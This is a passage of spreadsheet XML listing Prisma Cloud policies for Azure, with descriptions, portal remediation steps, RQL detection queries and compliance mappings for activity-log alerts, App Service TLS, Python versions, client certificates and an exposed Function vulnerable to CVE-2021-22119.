        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2165" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2165" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create or update public IP address rule does not exist</t>
        </is>
      </c>
      <c r="L2165" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2165" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2165" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2165" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2165" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2165" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2165" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2165" t="inlineStr"/>
      <c r="T2165" t="b">
        <v>0</v>
      </c>
      <c r="U2165" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2165" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2165" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create or update public IP address rule does not exist.
Creating an activity log alert for create or update public IP address rule gives insight into network rule access changes and may reduce the time it takes to detect suspicious activity. By enabling this monitoring, you get alerts whenever any changes are made to public IP address rules.
As a best practice, it is recommended to have a activity log alert for create or update public IP address rule to enhance network security monitoring and detect suspicious activities.</t>
        </is>
      </c>
      <c r="X2165" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create or Update Public Ip Address (Public Ip Address)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2165" t="inlineStr"/>
      <c r="Z2165"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Microsoft.Network/publicIPAddresses/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2165" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2165" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2165" t="inlineStr">
        <is>
          <t>PC-AZR-MON-1178</t>
        </is>
      </c>
      <c r="AD2165" t="b">
        <v>1</v>
      </c>
      <c r="AE2165" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2165" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>f8073341-12da-4544-8b30-1f0248fc562e</t>
        </is>
      </c>
      <c r="AI2165" t="inlineStr">
        <is>
          <t>7eb3f51a-91d2-4650-b6bb-d51c71fb1725</t>
        </is>
      </c>
      <c r="AJ2165" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2165" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2166">
      <c r="A2166" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Fedramp (Moderate), testazure, CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Azure Security Benchmark (v2), PCI DSS v3.2.1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, Copy of CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CIS v2.0.0 (Azure) Level 1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CIS v1.1 (Azure), CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CIS Controls v8, CIS v2.1.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, MTSBv2_Azure, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, Fedramp (Low), Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1,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NIST CSF, Fedramp (Moderate), NIST CSF, CIS v1.4.0 (Azure), ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS v1.5.0 (Azure) - Level 1, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS v1.3.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2166" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2166" s="2" t="inlineStr"/>
      <c r="D2166" t="inlineStr"/>
      <c r="E2166" t="inlineStr"/>
      <c r="F2166" t="inlineStr"/>
      <c r="G2166" t="b">
        <v>0</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2166" t="inlineStr">
        <is>
          <t>azure-activity-log</t>
        </is>
      </c>
      <c r="K2166" t="inlineStr">
        <is>
          <t>Azure Activity log alert for Create or update security solution does not exist</t>
        </is>
      </c>
      <c r="L2166" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2166" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2166" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2166" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2166" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2166" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2166" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2166" t="inlineStr"/>
      <c r="T2166" t="b">
        <v>0</v>
      </c>
      <c r="U2166" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2166" t="inlineStr">
        <is>
          <t>azure-activity-log-alerts</t>
        </is>
      </c>
      <c r="W2166" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which activity log alert for Create or update security solution does not exist. Creating an activity log alert for Create or update security solution gives insight into changes to the active security solutions and may reduce the time it takes to detect suspicious activity.</t>
        </is>
      </c>
      <c r="X2166" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Click on Monitor (Left Panel)
3. Select 'Alerts'
4. Click on Create &gt; Alert rule
5. In 'Create an alert rule' page, choose the Scope as your Subscription and under the CONDITION section, choose 'Create or Update Security Solutions (Microsoft.Security/securitySolutions)' and Other fields you can set based on your custom settings.
6. Click on Create</t>
        </is>
      </c>
      <c r="Y2166" t="inlineStr"/>
      <c r="Z2166" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-activity-log-alerts' AND json.rule = "location equal ignore case Global and properties.enabled equals true and properties.scopes[*] does not contain resourceGroups and properties.condition.allOf[?(@.field=='operationName')].equals equals Microsoft.Security/securitySolutions/write" as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2166" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2166" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2166" t="inlineStr">
        <is>
          <t>PC-AZR-MON-493</t>
        </is>
      </c>
      <c r="AD2166" t="b">
        <v>1</v>
      </c>
      <c r="AE2166" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2166" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>48176c48-daf5-4fd0-93d5-58db6effbb33</t>
        </is>
      </c>
      <c r="AI2166" t="inlineStr">
        <is>
          <t>20463b7d-c084-448c-bfc7-f7d4ba253a4a</t>
        </is>
      </c>
      <c r="AJ2166" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2166" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 2</t>
        </is>
      </c>
      <c r="B2167" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2167" s="2" t="inlineStr"/>
      <c r="D2167" t="inlineStr"/>
      <c r="E2167" t="inlineStr"/>
      <c r="F2167" t="inlineStr"/>
      <c r="G2167" t="b">
        <v>1</v>
      </c>
      <c r="H216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167" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2167" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2167" t="inlineStr">
        <is>
          <t>TLS min_version</t>
        </is>
      </c>
      <c r="L2167" t="inlineStr"/>
      <c r="M2167" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2167" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2167" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2167" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2167" t="inlineStr">
        <is>
          <t>Policies</t>
        </is>
      </c>
      <c r="R2167" t="inlineStr">
        <is>
          <t>4.6.3</t>
        </is>
      </c>
      <c r="S2167" t="inlineStr"/>
      <c r="T2167" t="b">
        <v>0</v>
      </c>
      <c r="U2167" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2167" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2167" t="inlineStr"/>
      <c r="X2167" t="inlineStr">
        <is>
          <t>Build Recommendation: 
IaC:</t>
        </is>
      </c>
      <c r="Y2167" t="inlineStr"/>
      <c r="Z2167" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and config.minTlsVersion does not equal 1.2'
{"category":"Networking","resourceTypes":["azurerm_app_service"],"provider":"azure","framework":["Terraform"],"conditionQuery":{"attribute":"site_config.min_tls_version","operator":"equals","value":"1.1","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA2167" t="inlineStr">
        <is>
          <t>Tuan Le</t>
        </is>
      </c>
      <c r="AB2167" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2167" t="inlineStr"/>
      <c r="AD2167" t="b">
        <v>0</v>
      </c>
      <c r="AE2167" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2167" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG216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67" t="inlineStr">
        <is>
          <t>a1d74b62-fa08-4c81-9672-fed99fed38a5</t>
        </is>
      </c>
      <c r="AI2167" t="inlineStr">
        <is>
          <t>c28d8eb7-f1d9-402c-8c9a-8dbd44353ba9</t>
        </is>
      </c>
      <c r="AJ2167" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2167" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" t="inlineStr">
        <is>
          <t>MTSBv2_Azure, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS v2.0.0 (Azure) Level 1, CSA CCM v4.0.12, CIS v1.3.0 (Azure), Azure Security Benchmark (v2), NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-171 Revision 3, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v2.1.0 (Azure) Level 1, Insurance Regulatory And Development Authority Of India, Azure Security Benchmark (v2), NIST SP 800-172, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), CIS v1.4.0 (Azure), Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v8.2 [Deprecated], Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, MITRE ATT&amp;CK v10.0 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ITSG-33, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, CRI Profile v2.0, DORA, MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), CDC NIST 800-53 Rev4, CIS v1.3.1 (Azure), ISO/IEC 27001:2022, CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO 27002:2022, TX-RAMP Level 2, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, CIS v1.2.0 (Azure), PCI DSS v3.2.1, NIST CSF, Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, Copy of CIS v1.2.0 (Azure), ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, NIST CSF v2.0, TX-RAMP Level 1, CIS v1.5.0 (Azure) - Level 1, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST 800-53 Rev4, Azure Security Benchmark (v3), NIST CSF v2.0, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), NIST SP 800-172, testazure, CIS v1.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2168" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2168" s="2" t="inlineStr"/>
      <c r="D2168" t="inlineStr"/>
      <c r="E2168" t="inlineStr"/>
      <c r="F2168" t="inlineStr"/>
      <c r="G2168" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2168" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2168" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest Python version</t>
        </is>
      </c>
      <c r="L2168" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2168" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2168" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2168" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2168" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2168" t="inlineStr">
        <is>
          <t>9</t>
        </is>
      </c>
      <c r="R2168" t="inlineStr">
        <is>
          <t>9.8</t>
        </is>
      </c>
      <c r="S2168" t="inlineStr">
        <is>
          <t>AppService,Policy Status Review</t>
        </is>
      </c>
      <c r="T2168" t="b">
        <v>0</v>
      </c>
      <c r="U2168" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2168" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2168" t="inlineStr">
        <is>
          <t>This policy identifies App Service Web apps that are not configured with latest Python version. Periodically, newer versions are released for Python software either due to security flaws or to include additional functionality. It is recommended to use the latest Python version for web apps in order to take advantage of security fixes, if any.</t>
        </is>
      </c>
      <c r="X2168" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'App Services' dashboard
3. Select the reported web app service
4. Under 'Settings' section, Click on 'Configuration'
5. Click on 'General settings' tab, Ensure that Stack is set to Python and Minor version is set to latest version.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2168" t="inlineStr"/>
      <c r="Z2168" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'config.isPythonVersionLatest exists and config.isPythonVersionLatest equals false'</t>
        </is>
      </c>
      <c r="AA2168" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2168" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2168" t="inlineStr">
        <is>
          <t>PC-AZR-APP-412</t>
        </is>
      </c>
      <c r="AD2168" t="b">
        <v>1</v>
      </c>
      <c r="AE2168" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2168" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>2ca02092-5798-4cee-81cd-add4456253d3</t>
        </is>
      </c>
      <c r="AI2168" t="inlineStr">
        <is>
          <t>2b294b6a-47bc-448b-b916-6a77de8ac93e</t>
        </is>
      </c>
      <c r="AJ2168" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2168" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" t="inlineStr"/>
      <c r="B2169" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2169" s="2" t="inlineStr"/>
      <c r="D2169" t="inlineStr"/>
      <c r="E2169" t="inlineStr"/>
      <c r="F2169" t="inlineStr"/>
      <c r="G2169" t="b">
        <v>1</v>
      </c>
      <c r="H21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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2169" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2169" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable Azure Function [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L2169" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2169" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2169" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2169" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2169" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2169" t="inlineStr"/>
      <c r="R2169" t="inlineStr"/>
      <c r="S2169" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2169" t="b">
        <v>0</v>
      </c>
      <c r="U2169" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2169" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2169" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that are publicly exposed and have known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw allowing a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the Azure Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java [CVE-2021-22119] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2169"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2169" t="inlineStr"/>
      <c r="Z2169" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA2169" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2169" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:01</t>
        </is>
      </c>
      <c r="AC2169" t="inlineStr"/>
      <c r="AD2169" t="b">
        <v>1</v>
      </c>
      <c r="AE2169" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2169" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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69" t="inlineStr">
        <is>
          <t>f3dbdc16-aa1f-4354-a567-6c917bcdd0a9</t>
        </is>
      </c>
      <c r="AI2169" t="inlineStr">
        <is>
          <t>835aa99c-c453-45c4-8759-c6e910001d2c</t>
        </is>
      </c>
      <c r="AJ2169" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2169" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, FFIEC, TX-RAMP Level 2, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, CIS v1.1 (Azure), Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CIS Controls v8, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 1, NIST 800-53 Rev4, CSA CCM v.4.0.6, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8, Copy of CIS v1.2.0 (Azure), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, CIS v1.2.0 (Azure), Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), NIST CSF, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 2, PCI DSS v3.2.1, CIS v1.5.0 (Azure) - Level 2, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, CSA CCM v.4.0.1, Azure Security Benchmark (v3), ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.6, ISO 27002:2022, APRA (CPS 234) Information Security, CIS Controls v8.1, GDPR, Copy of CIS Controls v8, Copy of Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], MTSBv2_Azure, testazure, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.3.1 (Azure), NIST 800-53 Rev 5, CSA CCM v4.0.12, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, NIST SP 800-172, CIS v1.4.0 (Azure), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ITSG-33, Fedramp (Moderate), CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ITSG-33, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), CIS v2.0.0 (Azure) Level 2, Azure Security Benchmark (v3), Azure Security Benchmark (v2), CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2170" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2170" s="2" t="inlineStr"/>
      <c r="D2170" t="inlineStr"/>
      <c r="E2170" t="inlineStr"/>
      <c r="F2170" t="inlineStr"/>
      <c r="G2170" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2170" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2170" t="inlineStr">
        <is>
          <t>Azure App Service Web app client certificate is disabled</t>
        </is>
      </c>
      <c r="L2170" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2170" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2170" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2170" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2170" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2170" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2170" t="inlineStr">
        <is>
          <t>ISM-1321</t>
        </is>
      </c>
      <c r="S2170" t="inlineStr">
        <is>
          <t>AppService,Policy Status Review</t>
        </is>
      </c>
      <c r="T2170" t="b">
        <v>1</v>
      </c>
      <c r="U2170" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2170" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2170" t="inlineStr">
        <is>
          <t>This policy identifies Azure web apps which are not set with client certificate. Client certificates allow for the app to request a certificate for incoming requests. Only clients that have a valid certificate will be able to reach the app.</t>
        </is>
      </c>
      <c r="X2170" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App
4. Under Setting section, Click on 'Configuration'
5. Under 'General Settings' tab, In 'Incoming client certificates', Set 'Client certificate mode' to 'Require'
6. Click on 'Save'
